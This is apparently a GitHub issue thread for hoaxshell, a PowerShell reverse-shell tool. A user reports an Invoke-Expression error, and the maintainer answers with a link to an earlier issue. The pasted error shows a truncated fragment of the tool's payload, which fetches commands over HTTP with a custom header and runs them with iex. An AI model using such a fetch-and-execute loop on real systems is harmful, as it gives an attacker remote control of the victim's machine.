### ISSUE TITLE
when i try to paste it it to power shell i get this error

### ISSUE THREAD

**Issue by mickeymal** [t3l3machus/hoaxshell#31]
Invoke-Expression : Cannot bind argument to parameter 'Command' because it is null.                                     At line:1 char:289                                                                                                      + ... rs @{"X-7f3a-d0cd"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorA ...                                         +                                                                ~~                                                         + CategoryInfo          : InvalidData: (:) [Invoke-Expression], ParameterBindingValidationException                     + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.InvokeExpre     ssionCommand

**Comment by t3l3machus** [comment]
@mickeymal read this issue --> https://github.com/t3l3machus/hoaxshell/issues/15
